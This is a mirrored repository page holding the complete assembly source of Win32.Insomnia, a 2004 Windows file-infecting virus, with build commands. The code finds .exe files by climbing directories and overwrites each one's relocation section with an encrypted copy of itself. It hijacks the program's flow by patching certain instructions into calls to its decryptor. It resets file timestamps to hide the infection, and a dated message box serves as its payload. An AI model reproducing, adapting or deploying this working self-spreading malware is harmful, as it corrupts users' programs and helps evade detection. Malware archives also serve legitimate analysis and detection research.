mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-12 13:25:30 +00:00
469 lines
10 KiB
NASM
469 lines
10 KiB
NASM
|
; Win32.Insomnia (c) DR-EF.
|
|||
|
;--------------------------------------------------
|
|||
|
;virus name:Win32.Insomnia
|
|||
|
;virus author:DR-EF
|
|||
|
;virus size:1972 bytes
|
|||
|
;features:
|
|||
|
; o dont increase file size,overwrite reloc
|
|||
|
; section instead.
|
|||
|
; o use EPO - replace all mov eax,fs:[00000000]
|
|||
|
; instructions with call virus decryptor.
|
|||
|
; o encrypted with new key for each file.
|
|||
|
; o use the dotdot method to find files.
|
|||
|
;payload:messagebox with this text:
|
|||
|
; ".:[Win32.Insomnia <20> 2004 DR-EF]:."
|
|||
|
; every year at 29/12.
|
|||
|
;compile:
|
|||
|
; tasm32 /m3 /ml /zi Insomnia.asm , , ;
|
|||
|
; tlink32 /tpe /aa /v Insomnia , Insomnia,,import32.lib
|
|||
|
; pewrsec Insomnia.exe
|
|||
|
;--------------------------------------------------
|
|||
|
|
|||
|
.386
|
|||
|
.model flat
|
|||
|
|
|||
|
extrn ExitProcess:proc
|
|||
|
|
|||
|
virus_size equ (EndVirus-virus_start)
|
|||
|
INVALID_HANDLE_VALUE equ -1
|
|||
|
FILE_ATTRIBUTE_NORMAL equ 00000080h
|
|||
|
OPEN_EXISTING equ 3
|
|||
|
GENERIC_WRITE equ 40000000h
|
|||
|
GENERIC_READ equ 80000000h
|
|||
|
PAGE_READWRITE equ 4h
|
|||
|
FILE_MAP_WRITE equ 00000002h
|
|||
|
|
|||
|
.data
|
|||
|
db ?
|
|||
|
.code
|
|||
|
|
|||
|
virus_start:
|
|||
|
call Delta
|
|||
|
Delta: pop ebp
|
|||
|
sub ebp,offset Delta
|
|||
|
mov ecx,NumberOfKernelBases
|
|||
|
lea esi,[ebp + KernelBaseTable]
|
|||
|
@next_k:lodsd
|
|||
|
call GetKernel32Base
|
|||
|
jc GetApis
|
|||
|
loop @next_k
|
|||
|
jmp reth ;return to host
|
|||
|
KernelBaseTable:
|
|||
|
dd 804d4000h ;winXP
|
|||
|
dd 0bff60000h ;winME
|
|||
|
dd 77f00000h ;winNT
|
|||
|
dd 77e70000h ;win2K
|
|||
|
dd 0bff70000h ;win9X
|
|||
|
NumberOfKernelBases equ 5h
|
|||
|
|
|||
|
GetApis:mov eax,[ebp + kernel32base]
|
|||
|
add eax,[eax + 3ch]
|
|||
|
mov eax,[eax + 78h]
|
|||
|
add eax,[ebp + kernel32base]
|
|||
|
;eax - kernel32 export table
|
|||
|
push eax
|
|||
|
xor edx,edx
|
|||
|
mov eax,[eax + 20h]
|
|||
|
add eax,[ebp + kernel32base]
|
|||
|
mov edi,[eax]
|
|||
|
add edi,[ebp + kernel32base]
|
|||
|
;edi - api names array
|
|||
|
dec edi
|
|||
|
nxt_cmp:inc edi
|
|||
|
lea esi,[ebp + _GetProcAddress]
|
|||
|
mov ecx,0eh
|
|||
|
rep cmpsb
|
|||
|
je search_address
|
|||
|
inc edx
|
|||
|
nxt_l: cmp byte ptr [edi],0h
|
|||
|
je nxt_cmp
|
|||
|
inc edi
|
|||
|
jmp nxt_l
|
|||
|
search_address:
|
|||
|
pop eax
|
|||
|
;eax - kernel32 export table
|
|||
|
;edx - GetProcAddress position
|
|||
|
shl edx,1h
|
|||
|
mov ebx,[eax + 24h]
|
|||
|
add ebx,[ebp + kernel32base]
|
|||
|
add ebx,edx
|
|||
|
mov dx,word ptr [ebx]
|
|||
|
shl edx,2h
|
|||
|
mov ebx,[eax + 1ch]
|
|||
|
add ebx,[ebp + kernel32base]
|
|||
|
add ebx,edx
|
|||
|
mov ebx,[ebx]
|
|||
|
add ebx,[ebp + kernel32base]
|
|||
|
mov [ebp + GetProcAddress],ebx
|
|||
|
mov ecx,NumberOfApis
|
|||
|
lea eax,[ebp + ApiNamesTable]
|
|||
|
lea ebx,[ebp + ApiAddressTable]
|
|||
|
nxt_api:push ecx
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push [ebp + kernel32base]
|
|||
|
call [ebp + GetProcAddress]
|
|||
|
or eax,eax
|
|||
|
je api_err
|
|||
|
mov dword ptr [ebx],eax
|
|||
|
pop eax
|
|||
|
nxt_al: inc eax
|
|||
|
cmp byte ptr [eax],0h
|
|||
|
jne nxt_al
|
|||
|
inc eax
|
|||
|
add ebx,4h
|
|||
|
pop ecx
|
|||
|
loop nxt_api
|
|||
|
jmp InfectFiles
|
|||
|
api_err:add esp,8h
|
|||
|
jmp reth
|
|||
|
|
|||
|
_GetProcAddress db "GetProcAddress",0
|
|||
|
GetProcAddress dd 0
|
|||
|
kernel32base dd 0
|
|||
|
|
|||
|
ApiNamesTable:
|
|||
|
_FindFirstFile db "FindFirstFileA",0
|
|||
|
_FindNextFile db "FindNextFileA",0
|
|||
|
_GetCurrentDirectory db "GetCurrentDirectoryA",0
|
|||
|
_SetCurrentDirectory db "SetCurrentDirectoryA",0
|
|||
|
_CreateFile db "CreateFileA",0
|
|||
|
_CloseHandle db "CloseHandle",0
|
|||
|
_CreateFileMapping db "CreateFileMappingA",0
|
|||
|
_MapViewOfFile db "MapViewOfFile",0
|
|||
|
_UnmapViewOfFile db "UnmapViewOfFile",0
|
|||
|
_GetLocalTime db "GetLocalTime",0
|
|||
|
_LoadLibrary db "LoadLibraryA",0
|
|||
|
_SetFileTime db "SetFileTime",0
|
|||
|
|
|||
|
ApiAddressTable:
|
|||
|
FindFirstFile dd 0
|
|||
|
FindNextFile dd 0
|
|||
|
GetCurrentDirectory dd 0
|
|||
|
SetCurrentDirectory dd 0
|
|||
|
CreateFile dd 0
|
|||
|
CloseHandle dd 0
|
|||
|
CreateFileMapping dd 0
|
|||
|
MapViewOfFile dd 0
|
|||
|
UnmapViewOfFile dd 0
|
|||
|
GetLocalTime dd 0
|
|||
|
LoadLibrary dd 0
|
|||
|
SetFileTime dd 0
|
|||
|
|
|||
|
NumberOfApis equ 12
|
|||
|
|
|||
|
GetKernel32Base:
|
|||
|
pushad
|
|||
|
lea ebx,[ebp + k32err]
|
|||
|
push ebx
|
|||
|
xor ebx,ebx
|
|||
|
push dword ptr fs:[ebx]
|
|||
|
mov fs:[ebx],esp
|
|||
|
mov ebx,eax
|
|||
|
cmp word ptr [eax],"ZM"
|
|||
|
jne _k32err
|
|||
|
add eax,[eax + 3ch]
|
|||
|
cmp word ptr [eax],"EP"
|
|||
|
jne _k32err
|
|||
|
mov [ebp + kernel32base],ebx
|
|||
|
pop dword ptr fs:[0]
|
|||
|
add esp,4h
|
|||
|
popad
|
|||
|
stc
|
|||
|
ret
|
|||
|
_k32err:pop dword ptr fs:[0]
|
|||
|
add esp,4h
|
|||
|
popad
|
|||
|
clc
|
|||
|
ret
|
|||
|
k32err: mov esp,[esp + 8h]
|
|||
|
pop dword ptr fs:[0]
|
|||
|
add esp,4h
|
|||
|
popad
|
|||
|
clc
|
|||
|
ret
|
|||
|
|
|||
|
VirusCopyRight db ".:[Win32.Insomnia <20> 2004 DR-EF]:.",0
|
|||
|
|
|||
|
InfectFiles:
|
|||
|
mov [ebp + max_dirs],0fh
|
|||
|
lea eax,[ebp + cdir]
|
|||
|
push eax
|
|||
|
push 0ffh
|
|||
|
call [ebp + GetCurrentDirectory]
|
|||
|
or eax,eax
|
|||
|
je ReturnToHost
|
|||
|
s_files:cmp [ebp + max_dirs],0h
|
|||
|
je r_dir
|
|||
|
lea eax,[ebp + WIN32_FIND_DATA]
|
|||
|
push eax
|
|||
|
lea eax,[ebp + search_mask]
|
|||
|
push eax
|
|||
|
call [ebp + FindFirstFile]
|
|||
|
cmp eax,INVALID_HANDLE_VALUE
|
|||
|
je nxt_dir
|
|||
|
mov [ebp + hfind],eax
|
|||
|
i_file: call InfectFile
|
|||
|
lea eax,[ebp + WIN32_FIND_DATA]
|
|||
|
push eax
|
|||
|
push [ebp + hfind]
|
|||
|
call [ebp + FindNextFile]
|
|||
|
or eax,eax
|
|||
|
jne i_file
|
|||
|
nxt_dir:dec [ebp + max_dirs]
|
|||
|
lea eax,[ebp + dotdot]
|
|||
|
push eax
|
|||
|
call [ebp + SetCurrentDirectory]
|
|||
|
or eax,eax
|
|||
|
jne s_files
|
|||
|
r_dir: lea eax,[ebp + cdir]
|
|||
|
push eax
|
|||
|
call [ebp + SetCurrentDirectory]
|
|||
|
ReturnToHost:
|
|||
|
;check for payload:
|
|||
|
lea eax,[ebp + SYSTEMTIME]
|
|||
|
push eax
|
|||
|
call [ebp + GetLocalTime]
|
|||
|
cmp word ptr [ebp + wMonth],0ch
|
|||
|
jne reth
|
|||
|
cmp word ptr [ebp + wDay],1dh
|
|||
|
jne reth
|
|||
|
lea eax,[ebp + user32dll]
|
|||
|
push eax
|
|||
|
call [ebp + LoadLibrary]
|
|||
|
or eax,eax
|
|||
|
je reth
|
|||
|
lea ebx,[ebp + MessageBox]
|
|||
|
push ebx
|
|||
|
push eax
|
|||
|
call [ebp + GetProcAddress]
|
|||
|
or eax,eax
|
|||
|
je reth
|
|||
|
xor ecx,ecx
|
|||
|
push MB_ICONINFORMATION or MB_SYSTEMMODAL
|
|||
|
push ecx
|
|||
|
lea ebx,[ebp + VirusCopyRight]
|
|||
|
push ebx
|
|||
|
push ecx
|
|||
|
call eax
|
|||
|
reth: popfd
|
|||
|
popad
|
|||
|
db 64h,0A1h,0,0,0,0 ;mov eax,fs:[00000000]
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
SYSTEMTIME:
|
|||
|
wYear dw 0
|
|||
|
wMonth dw 0
|
|||
|
wDayOfWeek dw 0
|
|||
|
wDay dw 0
|
|||
|
wHour dw 0
|
|||
|
wMinute dw 0
|
|||
|
wSecond dw 0
|
|||
|
wMilliseconds dw 0
|
|||
|
|
|||
|
user32dll db "user32.dll",0
|
|||
|
MessageBox db "MessageBoxA",0
|
|||
|
MB_SYSTEMMODAL equ 00001000h
|
|||
|
MB_ICONINFORMATION equ 00000040h
|
|||
|
|
|||
|
|
|||
|
hfind dd 0
|
|||
|
max_dirs db 0fh
|
|||
|
search_mask db "*.exe",0
|
|||
|
dotdot db "..",0
|
|||
|
cdir db 0ffh dup(0)
|
|||
|
|
|||
|
|
|||
|
WIN32_FIND_DATA:
|
|||
|
dwFileAttributes dd 0
|
|||
|
ftCreationTime dq 0
|
|||
|
ftLastAccessTime dq 0
|
|||
|
ftLastWriteTime dq 0
|
|||
|
nFileSizeHigh dd 0
|
|||
|
nFileSizeLow dd 0
|
|||
|
dwReserved0 dd 0
|
|||
|
dwReserved1 dd 0
|
|||
|
cFileName db 0ffh dup (0)
|
|||
|
cAlternateFileName db 20 dup (0)
|
|||
|
|
|||
|
|
|||
|
InfectFile:
|
|||
|
inc byte ptr [ebp + decrypt_key] ;create new key
|
|||
|
lea ebx,[ebp + cFileName]
|
|||
|
xor eax,eax
|
|||
|
push eax
|
|||
|
push FILE_ATTRIBUTE_NORMAL
|
|||
|
push OPEN_EXISTING
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push GENERIC_READ or GENERIC_WRITE
|
|||
|
push ebx
|
|||
|
call [ebp + CreateFile]
|
|||
|
cmp eax,INVALID_HANDLE_VALUE
|
|||
|
je ExitInfect
|
|||
|
mov [ebp + hfile],eax
|
|||
|
xor eax,eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push PAGE_READWRITE
|
|||
|
push eax
|
|||
|
push [ebp + hfile]
|
|||
|
call [ebp + CreateFileMapping]
|
|||
|
or eax,eax
|
|||
|
je close_f
|
|||
|
mov [ebp + hmap],eax
|
|||
|
xor eax,eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push FILE_MAP_WRITE
|
|||
|
push [ebp + hmap]
|
|||
|
call [ebp + MapViewOfFile]
|
|||
|
or eax,eax
|
|||
|
je close_m
|
|||
|
mov [ebp + mapbase],eax
|
|||
|
;check for valid pe file
|
|||
|
cmp word ptr [eax],"ZM"
|
|||
|
jne CloseFile
|
|||
|
add eax,[eax + 3ch]
|
|||
|
cmp word ptr [eax],"EP"
|
|||
|
jne CloseFile
|
|||
|
;goto sections table
|
|||
|
mov cx,[eax + 6h] ; get number of sections
|
|||
|
and ecx,0ffffh
|
|||
|
mov ebx,[eax + 34h];get image base
|
|||
|
mov dword ptr [ebp + Virus_Start],ebx ;save image base insaid decryptor
|
|||
|
mov ebx,[eax + 74h];get number of datadirectory
|
|||
|
shl ebx,3h
|
|||
|
add eax,ebx
|
|||
|
add eax,78h
|
|||
|
push eax ;eax - sections table
|
|||
|
push ecx ;ecx - number of sections
|
|||
|
;check for reloc section
|
|||
|
@sec: cmp dword ptr [eax],"ler."
|
|||
|
jne nxt_sec
|
|||
|
cmp dword ptr [eax + 2h],"cole"
|
|||
|
je f_rec
|
|||
|
nxt_sec:add eax,28h
|
|||
|
loop @sec
|
|||
|
ext_rlc:add esp,8h ;restore stack
|
|||
|
jmp CloseFile
|
|||
|
;check if the reloc section is bigger than virus
|
|||
|
f_rec: cmp dword ptr [eax + 8h],virus_size ;eax - reloc section header !
|
|||
|
jb ext_rlc
|
|||
|
;set new section flags
|
|||
|
or dword ptr [eax + 24h],0c0000020h ;code\readable\writeable
|
|||
|
;goto the section raw data:
|
|||
|
mov edx,[eax + 0ch]
|
|||
|
mov eax,[eax + 14h]
|
|||
|
add eax,[ebp + mapbase]
|
|||
|
;overwrite the reloc section with the virus
|
|||
|
mov edi,eax
|
|||
|
lea esi,[ebp + virus_start]
|
|||
|
mov ecx,virus_size
|
|||
|
@enc: lodsb
|
|||
|
xor al,byte ptr [ebp + decrypt_key]
|
|||
|
stosb
|
|||
|
loop @enc
|
|||
|
pop ecx ;ecx - number of sections
|
|||
|
pop ebx ;ebx - sections table
|
|||
|
sub eax,[ebp + mapbase]
|
|||
|
add dword ptr [ebp + Virus_Start],edx ;eax - virus start infected files
|
|||
|
@sec2: cmp dword ptr [ebx + 1h],"txet" ;text ?
|
|||
|
je f_cod
|
|||
|
cmp dword ptr [ebx + 1h],"edoc" ;code ?
|
|||
|
je f_cod
|
|||
|
cmp dword ptr [ebx],"EDOC" ;CODE ?
|
|||
|
je f_cod
|
|||
|
add ebx,28h
|
|||
|
loop @sec2
|
|||
|
add esp,4h ;restore stack
|
|||
|
jmp CloseFile
|
|||
|
;ebx - code section header
|
|||
|
f_cod: mov ecx,[ebx + 10h] ;ecx - size of section raw data
|
|||
|
mov edx,[ebx + 8h] ;edx - virtual section size
|
|||
|
sub ecx,edx
|
|||
|
cmp ecx,DecryptorSize
|
|||
|
ja write_d
|
|||
|
add esp,4h
|
|||
|
jmp CloseFile
|
|||
|
write_d:mov edi,[ebx + 14h]
|
|||
|
mov [ebp + virus_entry_point],edi
|
|||
|
add [ebp + virus_entry_point],edx
|
|||
|
add edi,[ebp + mapbase]
|
|||
|
push edi ;save code section raw data
|
|||
|
add edi,edx ;esi - where to write virus decryptor
|
|||
|
lea esi,[ebp + VirusDecryptorStart]
|
|||
|
mov ecx,DecryptorSize
|
|||
|
rep movsb
|
|||
|
pop esi ;esi - code section raw data
|
|||
|
;search for all mov eax,fs:[00000000] and replace it with nop --> call virus_decryptor
|
|||
|
xchg edx,ecx ;ecx - code section virtual size
|
|||
|
@1: cmp word ptr [esi],0a164h
|
|||
|
jne nxt_w
|
|||
|
cmp dword ptr [esi + 2],0
|
|||
|
jne nxt_w
|
|||
|
;esi - mov eax,fs:[00000000] location.
|
|||
|
mov byte ptr [esi],90h ;nop
|
|||
|
mov byte ptr [esi + 1h],0e8h;call
|
|||
|
mov eax,[ebp + virus_entry_point]
|
|||
|
mov ebx,esi
|
|||
|
sub ebx,[ebp + mapbase]
|
|||
|
sub eax,ebx
|
|||
|
sub eax,6h
|
|||
|
mov dword ptr [esi + 2h],eax
|
|||
|
nxt_w: inc esi
|
|||
|
loop @1
|
|||
|
CloseFile:
|
|||
|
push [ebp + mapbase]
|
|||
|
call [ebp + UnmapViewOfFile]
|
|||
|
close_m:push [ebp + hmap]
|
|||
|
call [ebp + CloseHandle]
|
|||
|
close_f:lea eax,[ebp + ftLastWriteTime]
|
|||
|
push eax
|
|||
|
lea eax,[ebp + ftLastAccessTime]
|
|||
|
push eax
|
|||
|
lea eax,[ebp + ftCreationTime]
|
|||
|
push eax
|
|||
|
push [ebp + hfile]
|
|||
|
call [ebp + SetFileTime]
|
|||
|
push [ebp + hfile]
|
|||
|
call [ebp + CloseHandle]
|
|||
|
ExitInfect:
|
|||
|
ret
|
|||
|
|
|||
|
VirusDecryptorStart equ $
|
|||
|
pushad
|
|||
|
pushfd
|
|||
|
mov esi,00000000
|
|||
|
Virus_Start equ $-4
|
|||
|
push esi
|
|||
|
mov edi,esi
|
|||
|
mov ecx,virus_size
|
|||
|
@dcrypt:lodsb
|
|||
|
xor al,5h
|
|||
|
decrypt_key equ $-1
|
|||
|
stosb
|
|||
|
loop @dcrypt
|
|||
|
ret
|
|||
|
EndVirusDecryptor equ $
|
|||
|
DecryptorSize equ (EndVirusDecryptor - VirusDecryptorStart)
|
|||
|
|
|||
|
hfile dd 0
|
|||
|
hmap dd 0
|
|||
|
mapbase dd 0
|
|||
|
virus_entry_point dd 0
|
|||
|
|
|||
|
EndVirus equ $
|
|||
|
|
|||
|
First_Gen_Host:
|
|||
|
push offset exit
|
|||
|
pushfd
|
|||
|
pushad
|
|||
|
jmp virus_start
|
|||
|
exit: push eax
|
|||
|
call ExitProcess
|
|||
|
end First_Gen_Host
|